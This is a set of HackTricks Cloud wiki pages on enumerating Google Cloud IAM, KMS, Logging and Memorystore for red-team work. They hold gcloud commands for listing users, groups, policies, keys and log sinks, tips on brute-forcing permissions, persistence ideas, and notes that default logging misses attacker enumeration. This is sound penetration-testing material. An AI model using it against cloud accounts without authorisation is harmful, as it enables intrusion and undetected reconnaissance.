Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Service Accounts
For an intro about what is a service account check:
{% content-ref url="../gcp-basic-information/" %}
[gcp-basic-information](../gcp-basic-information/)
{% endcontent-ref %}
### Enumeration
A service account always belongs to a project:
```bash
gcloud iam service-accounts list --project <project>
```
## Users & Groups
For an intro about how Users & Groups work in GCP check:
{% content-ref url="../gcp-basic-information/" %}
[gcp-basic-information](../gcp-basic-information/)
{% endcontent-ref %}
### Enumeration
With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`** it's possible to **enable services** in a project and use them.
{% hint style="danger" %}
Note that by default, Workspace users are granted the role **Project Creator**, giving them access to **create new projects**. When a user creates a project, he is granted the **`owner`** role over it. So, he could **enable these services over the project to be able to enumerate Workspace**.
However, notice that it's also needed to have **enough permissions in Workspace** to be able to call these APIs.
{% endhint %}
If you can **enable the `admin` service** and if your user has **enough privileges in workspace,** you could **enumerate all groups & users** with the following lines.\
Even if it says **`identity groups`**, it also returns **users without any groups**:
{% code overflow="wrap" %}
```bash
# Enable admin
gcloud services enable admin.googleapis.com
gcloud services enable cloudidentity.googleapis.com
# Using admin.googleapis.com
## List all users
gcloud organizations list #The DIRECTORY_CUSTOMER_ID is the Workspace ID
gcloud beta identity groups preview --customer <workspace-id>
# Using cloudidentity.googleapis.com
## List groups of a user (you can list at least the groups you belong to)
gcloud identity groups memberships search-transitive-groups --member-email <email> --labels=cloudidentity.googleapis.com/groups.discussion_forum
## List Group Members (you can list at least the groups you belong to)
gcloud identity groups memberships list --group-email=<email>
### Make it transitive
gcloud identity groups memberships search-transitive-memberships --group-email=<email>
## Get a graph (if you have enough permissions)
gcloud identity groups memberships get-membership-graph --member-email=<email> --labels=cloudidentity.googleapis.com/groups.discussion_forum
```
{% endcode %}
{% hint style="success" %}
In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc_groups_users.py).
{% endhint %}
Even with the admin service enable, it's possible that you get an error enumerating them because your compromised workspace user doesn't have enough permissions:
<figure><img src="../../../.gitbook/assets/image (193).png" alt=""><figcaption></figcaption></figure>
## IAM
Check [**this for basic information about IAM**](../gcp-basic-information/#iam-roles).
### Default Permissions
From the [**docs**](https://cloud.google.com/resource-manager/docs/default-access-control): When an organization resource is created, all users in your domain are granted the **Billing Account Creator** and **Project Creator** roles by default. These default roles allow your users to start using Google Cloud immediately, but are not intended for use in regular operation of your organization resource.
These **roles** grant the **permissions**:
* `billing.accounts.create` and `resourcemanager.organizations.get`
* `resourcemanager.organizations.get` and `resourcemanager.projects.create`
Moreover, when a user creates a project, he is **granted owner of that project automatically** according to the [docs](https://cloud.google.com/resource-manager/docs/access-control-proj). Therefore, by default, a user will be able to create a project and run any service on it (miners? Workspace enumeration? ...)
{% hint style="danger" %}
The highest privilege in a GCP Organization is the **Organization Administrator** role.
{% endhint %}
### set-iam-policy vs add-iam-policy-binding
In most of the services you will be able to change the permissions over a resource using the method **`add-iam-policy-binding`** or **`set-iam-policy`**. The main difference is that **`add-iam-policy-binding` adds a new role binding** to the existent IAM policy while **`set-iam-policy`** will **delete the previously** granted permissions and **set only the ones** indicated in the command.
### Enumeration
```bash
# Roles
## List roles
gcloud iam roles list --project $PROJECT_ID # List only custom roles
gcloud iam roles list --filter='etag:AA=='
## Get perms and description of role
gcloud iam roles describe roles/container.admin
gcloud iam roles describe --project <proj-name> <role-name>
# Policies
gcloud organizations get-iam-policy <org_id>
gcloud resource-manager folders get-iam-policy <folder-id>
gcloud projects get-iam-policy <project-id>
# MISC
## Testable permissions in resource
gcloud iam list-testable-permissions --filter "NOT apiDisabled: true" <resource>
## Grantable roles to a resource
gcloud iam list-grantable-roles <project URL>
```
### cloudasset IAM Enumeration
There are different ways to check all the permissions of a user in different resources (such as organizations, folders, projects...) using this service.
* The permission **`cloudasset.assets.searchAllIamPolicies`** can request **all the iam policies** inside a resource.
```bash
gcloud asset search-all-iam-policies #By default uses current configured project
gcloud asset search-all-iam-policies --scope folders/1234567
gcloud asset search-all-iam-policies --scope organizations/123456
gcloud asset search-all-iam-policies --scope projects/project-id-123123
```
* The permission **`cloudasset.assets.analyzeIamPolicy`** can request **all the iam policies** of a principal inside a resource.
```bash
# Needs perm "cloudasset.assets.analyzeIamPolicy" over the asset
gcloud asset analyze-iam-policy --organization=<org-id> \
--identity='user:email@hacktricks.xyz'
gcloud asset analyze-iam-policy --folder=<folder-id> \
--identity='user:email@hacktricks.xyz'
gcloud asset analyze-iam-policy --project=<project-name> \
--identity='user:email@hacktricks.xyz'
```
* The permission **`cloudasset.assets.searchAllResources`** allows listing all resources of an organization, folder, or project. IAM related resources (like roles) included.
```bash
gcloud asset search-all-resources --scope projects/<proj-name>
gcloud asset search-all-resources --scope folders/1234567
gcloud asset search-all-resources --scope organizations/123456
```
* The permission **`cloudasset.assets.analyzeMove`** but be useful to also retrieve policies affecting a resource like a project
```bash
gcloud asset analyze-move --project=<proj-name> \
--destination-organization=609216679593
```
* I suppose the permission **`cloudasset.assets.queryIamPolicy`** could also give access to find permissions of principals
```bash
# But, when running something like this
gcloud asset query --project=<proj> --statement='SELECT * FROM compute_googleapis_com_Instance'
# I get the error
ERROR: (gcloud.asset.query) UNAUTHENTICATED: QueryAssets API is only supported for SCC premium customers. See https://cloud.google.com/security-command-center/pricing
```
### testIamPermissions enumeration
{% hint style="danger" %}
If you **cannot access IAM information** using the previous methods and you are in a Red Team. You could **use the tool**[ **https://github.com/carlospolop/bf\_my\_gcp\_perms**](https://github.com/carlospolop/bf_my_gcp_perms) **to brute-force your current permissions.**
However, note that the service **`cloudresourcemanager.googleapis.com`** needs to be enabled.
{% endhint %}
### Privesc
In the following page you can check how to **abuse IAM permissions to escalate privileges**:
{% content-ref url="../gcp-privilege-escalation/gcp-iam-privesc.md" %}
[gcp-iam-privesc.md](../gcp-privilege-escalation/gcp-iam-privesc.md)
{% endcontent-ref %}
### Unauthenticated Enum <a href="#service-account-impersonation" id="service-account-impersonation"></a>
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md" %}
[gcp-iam-principals-and-org-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md)
{% endcontent-ref %}
### Post Exploitation <a href="#service-account-impersonation" id="service-account-impersonation"></a>
{% content-ref url="../gcp-post-exploitation/gcp-iam-post-exploitation.md" %}
[gcp-iam-post-exploitation.md](../gcp-post-exploitation/gcp-iam-post-exploitation.md)
{% endcontent-ref %}
### Persistence
If you have high privileges you could:
* Create new SAs (or users if in Workspace)
* Give principals controlled by yourself more permissions
* Give more privileges to vulnerable SAs (SSRF in vm, vuln Cloud Function…)
*
## Org Policies
For an intro about what Org Policies are check:
{% content-ref url="../gcp-basic-information/" %}
[gcp-basic-information](../gcp-basic-information/)
{% endcontent-ref %}
The IAM policies indicate the permissions principals has over resources via roles, which are assigned granular permissions. Organization policies **restrict how those services can be used or which features are disabled**. This helps in order to improve the least privilege of each resource in the GCP environment.
```bash
gcloud resource-manager org-policies list --organization=ORGANIZATION_ID
gcloud resource-manager org-policies list --folder=FOLDER_ID
gcloud resource-manager org-policies list --project=PROJECT_ID
```
### Privesc
In the following page you can check how to **abuse org policies permissions to escalate privileges**:
{% content-ref url="../gcp-privilege-escalation/gcp-orgpolicy-privesc.md" %}
[gcp-orgpolicy-privesc.md](../gcp-privilege-escalation/gcp-orgpolicy-privesc.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

108
pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md Normal file
View File

@@ -0,0 +1,108 @@
# GCP - KMS Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## KMS
The [**Cloud Key Management Service**](https://cloud.google.com/kms/docs/) serves as a secure storage for **cryptographic keys**, which are essential for operations like **encrypting and decrypting sensitive data**. These keys are organized within key rings, allowing for structured management. Furthermore, access control can be meticulously configured, either at the individual key level or for the entire key ring, ensuring that permissions are precisely aligned with security requirements.
KMS key rings are by **default created as global**, which means that the keys inside that key ring are accessible from any region. However, it's possible to create specific key rings in **specific regions**.
### Key Protection Level
* **Software keys**: Software keys are **created and managed by KMS entirely in software**. These keys are **not protected by any hardware security module (HSM)** and can be used for t**esting and development purposes**. Software keys are **not recommended for production** use because they provide low security and are susceptible to attacks.
* **Cloud-hosted keys**: Cloud-hosted keys are **created and managed by KMS** in the cloud using a highly available and reliable infrastructure. These keys are **protected by HSMs**, but the HSMs are **not dedicated to a specific customer**. Cloud-hosted keys are suitable for most production use cases.
* **External keys**: External keys are **created and managed outside of KMS**, and are imported into KMS for use in cryptographic operations. External keys **can be stored in a hardware security module (HSM) or a software library, depending on the customer's preference**.
### Key Purposes
* **Symmetric encryption/decryption**: Used to **encrypt and decrypt data using a single key for both operations**. Symmetric keys are fast and efficient for encrypting and decrypting large volumes of data.
* **Supported**: [cryptoKeys.encrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt), [cryptoKeys.decrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt)
* **Asymmetric Signing**: Used for secure communication between two parties without sharing the key. Asymmetric keys come in a pair, consisting of a **public key and a private key**. The public key is shared with others, while the private key is kept secret.
* **Supported:** [cryptoKeyVersions.asymmetricSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricSign), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
* **Asymmetric Decryption**: Used to verify the authenticity of a message or data. A digital signature is created using a private key and can be verified using the corresponding public key.
* **Supported:** [cryptoKeyVersions.asymmetricDecrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricDecrypt), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
* **MAC Signing**: Used to ensure **data integrity and authenticity by creating a message authentication code (MAC) using a secret key**. HMAC is commonly used for message authentication in network protocols and software applications.
* **Supported:** [cryptoKeyVersions.macSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macSign), [cryptoKeyVersions.macVerify](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macVerify)
### Rotation Period & Programmed for destruction period
By **default**, each **90 days** but it can be **easily** and **completely customized.**
The "Programmed for destruction" period is the **time since the user ask for deleting the key** and until the key is **deleted**. It cannot be changed after the key is created (default 1 day).
### Primary Version
Each KMS key can have several versions, one of them must be the **default** one, this will be the one used when a **version is not specified when interacting with the KMs key**.
### Enumeration
Having **permissions to list the keys** this is how you can access them:
```bash
# List the global keyrings available
gcloud kms keyrings list --location global
gcloud kms keyrings get-iam-policy <KEYRING>
# List the keys inside a keyring
gcloud kms keys list --keyring <KEYRING> --location <global/other_locations>
gcloud kms keys get-iam-policy <KEY>
# Encrypt a file using one of your keys
gcloud kms encrypt --ciphertext-file=[INFILE] \
--plaintext-file=[OUTFILE] \
--key [KEY] \
--keyring [KEYRING] \
--location global
# Decrypt a file using one of your keys
gcloud kms decrypt --ciphertext-file=[INFILE] \
--plaintext-file=[OUTFILE] \
--key [KEY] \
--keyring [KEYRING] \
--location global
```
### Privilege Escalation
{% content-ref url="../gcp-privilege-escalation/gcp-kms-privesc.md" %}
[gcp-kms-privesc.md](../gcp-privilege-escalation/gcp-kms-privesc.md)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-kms-post-exploitation.md" %}
[gcp-kms-post-exploitation.md](../gcp-post-exploitation/gcp-kms-post-exploitation.md)
{% endcontent-ref %}
## References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

181
pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md Normal file
View File

@@ -0,0 +1,181 @@
# GCP - Logging Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
This service allows users to store, search, analyze, monitor, and alert on **log data and events** from GCP.
Cloud Logging is fully integrated with other GCP services, providing a centralized repository for logs from all your GCP resources. It **automatically collects logs from various GCP services** like App Engine, Compute Engine, and Cloud Functions. You can also use Cloud Logging for applications running on-premises or in other clouds by using the Cloud Logging agent or API.
Key Features:
* **Log Data Centralization:** Aggregate log data from various sources, offering a holistic view of your applications and infrastructure.
* **Real-time Log Management:** Stream logs in real time for immediate analysis and response.
* **Powerful Data Analysis:** Use advanced filtering and search capabilities to sift through large volumes of log data quickly.
* **Integration with BigQuery:** Export logs to BigQuery for detailed analysis and querying.
* **Log-based Metrics:** Create custom metrics from your log data for monitoring and alerting.
### Logs flow
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption><p><a href="https://betterstack.com/community/guides/logging/gcp-logging/">https://betterstack.com/community/guides/logging/gcp-logging/</a></p></figcaption></figure>
Basically the sinks and log based metrics will device where a log should be stored.
### Configurations Supported by GCP Logging
Cloud Logging is highly configurable to suit diverse operational needs:
1. **Log Buckets (Logs storage in the web):** Define buckets in Cloud Logging to manage **log retention**, providing control over how long your log entries are retained.
* By default the buckets `_Default` and `_Required` are created (one is logging what the other isnt).
* **\_Required** is:
{% code overflow="wrap" %}
````
```bash
LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency")
```
````
{% endcode %}
* **Retention period** of the data is configured per bucket and must be **at least 1 day.** However the **retention period of \_Required is 400 days** and cannot be modified.
* Note that Log Buckets are **not visible in Cloud Storage.**
2. **Log Sinks (Log router in the web):** Create sinks to **export log entries** to various destinations such as Pub/Sub, BigQuery, or Cloud Storage based on a **filter**.
* By **default** sinks for the buckets `_Default` and `_Required` are created:
* ```bash
_Required logging.googleapis.com/projects/<proj-name>/locations/global/buckets/_Required LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency")
_Default logging.googleapis.com/projects/<proj-name>/locations/global/buckets/_Default NOT LOG_ID("cloudaudit.googleapis.com/activity") AND NOT LOG_ID("externalaudit.googleapis.com/activity") AND NOT LOG_ID("cloudaudit.googleapis.com/system_event") AND NOT LOG_ID("externalaudit.googleapis.com/system_event") AND NOT LOG_ID("cloudaudit.googleapis.com/access_transparency") AND NOT LOG_ID("externalaudit.googleapis.com/access_transparency")
```
* **Exclusion Filters:** It's possible to set up **exclusions to prevent specific log entries** from being ingested, saving costs, and reducing unnecessary noise.
3. **Log-based Metrics:** Configure **custom metrics** based on the content of logs, allowing for alerting and monitoring based on log data.
4. **Log views:** Log views give advanced and **granular control over who has access** to the logs within your log buckets.
* Cloud Logging **automatically creates the `_AllLogs` view for every bucket**, which shows all logs. Cloud Logging also creates a view for the `_Default` bucket called `_Default`. The `_Default` view for the `_Default` bucket shows all logs except Data Access audit logs. The `_AllLogs` and `_Default` views are not editable.
It's possible to allow a principal **only to use a specific Log view** with an IAM policy like:
{% code overflow="wrap" %}
```json
{
"bindings": [
{
"members": [
"user:username@gmail.com"
],
"role": "roles/logging.viewAccessor",
"condition": {
"title": "Bucket reader condition example",
"description": "Grants logging.viewAccessor role to user username@gmail.com for the VIEW_ID log view.",
"expression":
"resource.name == \"projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_NAME/views/VIEW_ID\""
}
}
],
"etag": "BwWd_6eERR4=",
"version": 3
}
```
{% endcode %}
### Default Logs
By default **Admin Write** operations (also called Admin Activity audit logs) are the ones logged (write metadata or configuration information) and **can't be disabled**.
Then, the user can enable **Data Access audit logs**, these are **Admin Read, Data Write and Data Write**.
You can find more info about each type of log in the docs: [https://cloud.google.com/iam/docs/audit-logging](https://cloud.google.com/iam/docs/audit-logging)
However, note that this means that by default **`GetIamPolicy`** actions and other read actions are **not being logged**. So, by default an attacker trying to enumerate the environment won't be caught if the sysadmin didn't configure to generate more logs.
To enable more logs in the console the sysadmin needs to go to [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) and enable them. There are 2 different options:
* **Default Configuration**: It's possible to create a default configuration and log all the Admin Read and/or Data Read and/or Data Write logs and even add exempted principals:
<figure><img src="../../../.gitbook/assets/image (338).png" alt=""><figcaption></figcaption></figure>
* **Select the services**: Or just **select the services** you would like to generate logs and the type of logs and the excepted principal for that specific service.
Also note that by default only those logs are being generated because generating more logs will increase the costs.
### Enumeration
The `gcloud` command-line tool is an integral part of the GCP ecosystem, allowing you to manage your resources and services. Here's how you can use `gcloud` to manage your logging configurations and access logs.
{% code overflow="wrap" %}
```bash
# List buckets
gcloud logging buckets list
gcloud logging buckets describe <bucket-name> --location <location>
# List log entries: only logs that contain log entries are listed.
gcloud logging logs list
# Get log metrics
gcloud logging metrics list
gcloud logging metrics describe <metric-name>
# Get log sinks
gcloud logging sinks list
gcloud logging sinks describe <sink-name>
# Get log views
gcloud logging views list --bucket <bucket> --location global
gcloud logging views describe --bucket <bucket> --location global <view-id> # view-id is usually the same as the bucket name
# Get log links
gcloud logging links list --bucket _Default --location global
gcloud logging links describe <link-id> --bucket _Default --location global
```
{% endcode %}
Example to check the logs of **`cloudresourcemanager`** (the one used to BF permissions): [https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512](https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512)
There aren't logs of **`testIamPermissions`**:
<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-logging-post-exploitation.md" %}
[gcp-logging-post-exploitation.md](../gcp-post-exploitation/gcp-logging-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-logging-persistence.md" %}
[gcp-logging-persistence.md](../gcp-persistence/gcp-logging-persistence.md)
{% endcontent-ref %}
## References
* [https://cloud.google.com/logging/docs/logs-views#gcloud](https://cloud.google.com/logging/docs/logs-views#gcloud)
* [https://betterstack.com/community/guides/logging/gcp-logging/](https://betterstack.com/community/guides/logging/gcp-logging/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

47
pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md Normal file
View File

@@ -0,0 +1,47 @@
# GCP - Memorystore Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Memorystore
Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
```bash
# Memcache
gcloud memcache instances list --region <region>
gcloud memcache instances describe <INSTANCE> --region <region>
# You should try to connect to the memcache instances to access the data
# Redis
gcloud redis instances list --region <region>
gcloud redis instances describe <INSTACE> --region <region>
gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

85
pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md Normal file
View File

@@ -0,0 +1,85 @@
# GCP - Monitoring Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
